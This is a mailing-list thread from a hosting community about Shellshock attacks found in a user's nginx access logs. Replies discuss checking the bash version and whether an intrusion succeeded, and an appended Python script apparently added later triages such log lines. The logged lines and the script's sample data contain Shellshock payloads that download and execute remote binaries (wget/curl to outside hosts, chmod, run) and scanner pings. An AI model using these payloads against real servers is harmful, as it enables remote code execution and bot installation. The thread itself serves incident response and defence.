<div dir="ltr">I have the following in my logs<div><br></div><div><div>root@yuna /home/rene # grep '() {' /var/log/nginx/*</div><div>/var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37 +0200] "GET /test HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z <a href="http://74.201.85.69/ec.z;chmod">74.201.85.69/ec.z;chmod</a> +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"</div><div>/var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37 +0200] "GET / HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z <a href="http://74.201.85.69/ec.z;chmod">74.201.85.69/ec.z;chmod</a> +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"</div><div>/var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z <a href="http://74.201.85.69/ec.z;chmod">74.201.85.69/ec.z;chmod</a> +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"</div><div>/var/log/nginx/access.log.1:209.126.230.72 - - [25/Sep/2014:07:26:09 +0200] "GET / HTTP/1.0" 200 193 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (<a href="http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html">http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html</a>)"</div><div>/var/log/nginx/access.log.1:89.207.135.125 - - [25/Sep/2014:11:26:32 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 200 193 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"</div><div>/var/log/nginx/access.log.1:54.251.83.67 - - [27/Sep/2014:21:35:34 +0200] "GET / HTTP/1.1" 200 193 "-" "() { :;}; /bin/bash -c \x22echo testing9123123\x22; /bin/uname -a"</div><div><font
color="#ff0000">/var/log/nginx/access.log.1:137.189.52.234 - - [27/Sep/2014:23:18:23 +0200] "GET /cgi-bin/test-cgi HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget <a href="http://stablehost.us/bots/regular.bot">http://stablehost.us/bots/regular.bot</a> -O /tmp/sh;curl -o /tmp/sh <a href="http://stablehost.us/bots/regular.bot;sh">http://stablehost.us/bots/regular.bot;sh</a> /tmp/sh;rm -rf /tmp/sh\x22"</font></div></div><div><br></div><div>This looks a bit bad :-/ ... what do you recommend doing about it? Just kill the suspicious processes? And look for any traces of whether they start up again after a reboot?</div><div><br></div></div><div class="gmail_extra"><br><div class="gmail_quote">2014-09-29 10:10 GMT+02:00 Michal Miklos <span dir="ltr"><<a href="mailto:mimik@mimik.sk" target="_blank">mimik@mimik.sk</a>></span>:<br><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex">The only thing to do is to find out whether you have a good version of bash.<br>
<div class="HOEnZb"><div class="h5"><br>
<br>
On 29 Sep 2014, at 10:08, Jan B. Kolář <<a href="mailto:janbivoj.kolar@zazen-nudu.cz">janbivoj.kolar@zazen-nudu.cz</a>> wrote:<br>
<br>
> Hi,<br>
><br>
> maybe a silly question - is there any way to tell from the log whether the intrusion was successful or not?<br>
><br>
> Honza<br>
><br>
> On 29.9.2014 10:02, Petr Krcmar wrote:<br>
>> On 29.9.2014 at 09:57, Jiří Medvěd wrote:<br>
>>> Look,<br>
>>><br>
>>> from another machine:<br>
>> Yes, I found that too. Evidently someone is trying to push a rootkit there:<br>
>><br>
>> <a href="http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/" target="_blank">http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/</a><br>
>><br>
><br>
> _______________________________________________<br>
> Community-list mailing list<br>
> <a href="mailto:Community-list@lists.vpsfree.cz">Community-list@lists.vpsfree.cz</a><br>
> <a href="http://lists.vpsfree.cz/listinfo/community-list" target="_blank">http://lists.vpsfree.cz/listinfo/community-list</a><br>
<br>
</div></div><br>
<br></blockquote></div><br></div>
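The grep used in the thread, extended into a triage pass, as an added example that is not part of the original messages: it parses nginx combined-format lines, reports which field carried the `() {` marker, and lists files the injected command names under /tmp, /var/tmp or /dev/shm so they can be checked on disk. The sample lines and addresses are constructed, and the field layout is assumed to be nginx's default combined format; the logged status code is nginx's response to the request and does not show whether the command ran.

```python
import re

# nginx "combined" format: ip - user [time] "request" status bytes "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"')
# The "() { :;};" prefix that the grep in the thread matches, spacing tolerated.
MARKER_RE = re.compile(r'\(\)\s*\{\s*:\s*;\s*\}\s*;')
# Files in world-writable directories named by the injected command.
PATH_RE = re.compile(r'(?<![\w.])/(?:var/tmp|tmp|dev/shm)/[\w.\-]+')
HEX_RE = re.compile(r'\\x([0-9A-Fa-f]{2})')

def unescape(value):
    """Undo nginx's \\xHH escaping (a double quote is logged as \\x22)."""
    return HEX_RE.sub(lambda m: chr(int(m.group(1), 16)), value)

def triage(lines):
    """Return one record per logged field that carries the marker."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not in combined format; skipped rather than guessed at
        for field in ("request", "referer", "agent"):
            value = unescape(m.group(field))
            marker = MARKER_RE.search(value)
            if marker:
                command = value[marker.end():].strip()
                hits.append({
                    "ip": m.group("ip"), "time": m.group("time"),
                    "field": field, "status": int(m.group("status")),
                    "command": command,
                    "paths": sorted(set(PATH_RE.findall(command))),
                })
    return hits

# Constructed sample lines (documentation addresses), not taken from the thread.
SAMPLE = [
    r'192.0.2.10 - - [28/Sep/2014:08:18:37 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/x.bin http://198.51.100.7/x.bin;chmod +x /var/tmp/x.bin\x22"',
    r'192.0.2.20 - - [25/Sep/2014:07:26:09 +0200] "GET / HTTP/1.0" 200 193 "() { :; }; ping -c 3 198.51.100.9" "example-scanner"',
    r'192.0.2.30 - - [25/Sep/2014:09:00:00 +0200] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in triage(SAMPLE):
        print(hit["time"], hit["ip"], hit["field"], hit["paths"], hit["command"])
```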